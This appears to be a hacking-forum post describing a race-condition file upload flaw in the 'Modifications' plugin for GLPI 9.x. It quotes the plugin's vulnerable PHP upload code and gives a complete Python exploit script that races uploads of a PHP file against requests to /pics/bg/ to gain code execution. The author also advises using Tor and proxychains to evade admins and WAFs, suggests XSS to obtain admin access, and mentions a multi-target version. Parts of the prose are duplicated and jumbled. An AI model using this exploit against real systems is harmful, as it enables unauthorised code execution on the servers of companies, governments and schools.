GLPI is a IT service manger used in companys, gov and education organizations, its a very interesting target and have tons of vulnerabilities, but none interesting code exec in relevant versions, with the exception of CVE-2020-11060 witch is very interesting (worth reading), but for some reason i could not reliably replicate .
After some hours of auditing the source code, i of course, could not find anything, just a few hours wouldn't break it, so i turned my attention to the glpi plugins that have way smaller code bases, and admins for some reason tend to just trust them, i found some bugs in multiple of then. Im going to show a insecure file upload i found that with the assistance of other vulnerabilities lead to php code exec.
The plugin is Modifications and it is used to modify the login page, home and menu bar for GLPI 9.X, and they have a very bad implementation of uploading files on upfile.php and uplogo.php.
After a bypassable
Instead of moving it from the _tmp directory to /pics/bg with the proper name, they choose trust the real file name without any checks to change directorys and then rename it:
So we can activate a php code inside a image, that drops your shell or do whatever, in the time frame between
That can be done by making multiple files uploads in a row and, at the same time, trying to access /pics/bg/uploaded_file.php, eventually you will hit the time frame.
Here is a simple python implementation :
. To exploit it you have to have access to a admin account, there are multiples xss to archive it.
. The better the connection you have faster it will work, but you can archive it routing on slow networks such tor and proxy chains, and it will only take a few minutes to exploit, although it will make tons of requests that a good admin or a waf could spot you.
I also have a much faster c++ implementation using libcurl and support for multiple targets.
If for some reason you have any questions fell free to pm.
After some hours of auditing the source code, i of course, could not find anything, just a few hours wouldn't break it, so i turned my attention to the glpi plugins that have way smaller code bases, and admins for some reason tend to just trust them, i found some bugs in multiple of then. Im going to show a insecure file upload i found that with the assistance of other vulnerabilities lead to php code exec.
The plugin is Modifications and it is used to modify the login page, home and menu bar for GLPI 9.X, and they have a very bad implementation of uploading files on upfile.php and uplogo.php.
After a bypassable
getimagesize :
PHP:
$info = getimagesize($_FILES['photo']['tmp_name']);
...
...
elseif($info === false) {
$valid_file = false;
die("Unable to determine image type of uploaded file");
}
PHP:
if($valid_file)
{
//move it to where we want it to be
$currentdir = getcwd();
$target = '../../pics/bg/' . basename($_FILES['photo']['name']);
//$target = $currentdir .'/uploads/' . basename($_FILES['photo']['name']);
move_uploaded_file($_FILES['photo']['tmp_name'], $target);
//move_uploaded_file($_FILES['photo']['tmp_name'], 'uploads'.$new_file_name);
rename('../../pics/bg/'.basename($_FILES['photo']['name']), '../../pics/bg/back.jpg');
$message = 'Congratulations! Your file was accepted.';
header('Location: ../../plugins/mod/config.php ');
//echo $message;
}move_uploaded_file($_FILES['photo']['tmp_name'], $target); and rename('../../pics/bg/'.basename($_FILES['photo']['name']), '../../pics/bg/back.jpg');callsThat can be done by making multiple files uploads in a row and, at the same time, trying to access /pics/bg/uploaded_file.php, eventually you will hit the time frame.
Here is a simple python implementation :
У вас должно быть более 0 реакций для просмотра скрытого контента.
Python:
# exploit & script by mngl :/
import requests
import re
from threading import Thread,Event
import time
site = 'http://192.168.0.200/glpi/'
cookie = 'glpi_3f946f74140a3178722cb675d5bf6b47=iphkrnce9jpr14327rvf4p3gt1'
file = 'aa.php'
csrf_tokens = []
stop_event=Event()
stop_event.clear()
t = 3
def main():
for n in range(t):
csrf = Thread(target = get_csrf)
upload = Thread(target = upload_file)
test = Thread(target = test_exploit)
test1 = Thread(target = test_exploit)
csrf.start()
time.sleep(t-n)
upload.start()
test.start()
test1.start()
def get_csrf():
header_csfr = {}
header_csfr['Cookie'] = cookie
header_csfr['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
proxies = {'http': 'http://127.0.0.1:8081'}
header_csfr['Referer'] = site + 'plugins/mod/config.php'
while not stop_event.is_set():
if len(csrf_tokens) < 6:
t = requests.get(site + 'plugins/mod/config.php',headers=header_csfr,allow_redirects=True)
#print(t.text)
csrf_tokens.append(re.search('[0-9a-z]{32,}',t.text).group())
#print(csrf_tokens)
def upload_file():
header= {}
header['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
header['Cookie'] = cookie
header['Referer'] = site + 'plugins/mod/config.php'
data_ ={
'submit':'Send',
}
proxies = {'http': 'http://127.0.0.1:8081'}
while not stop_event.is_set():
image = open(file,'rb')
files_ = {'photo':(file,image,'application/x-php') }
data_['_glpi_csrf_token'] = csrf_tokens[0]
#print(data_)
csrf_tokens.pop(0)
r = requests.post(site + 'plugins/mod/upfile.php',files=files_,data=data_,headers=header,allow_redirects=False)
#print(r.request.body)
def test_exploit():
while not stop_event.is_set():
#time.sleep(.02)
e = requests.get(site + 'pics/bg/' + file)
if e.status_code == 200:
stop_event.set()
print('(: pwn :)')
break
print(f"{e.status_code} nop")
if __name__ == '__main__':
main(). To exploit it you have to have access to a admin account, there are multiples xss to archive it.
. The better the connection you have faster it will work, but you can archive it routing on slow networks such tor and proxy chains, and it will only take a few minutes to exploit, although it will make tons of requests that a good admin or a waf could spot you.
I also have a much faster c++ implementation using libcurl and support for multiple targets.
If for some reason you have any questions fell free to pm.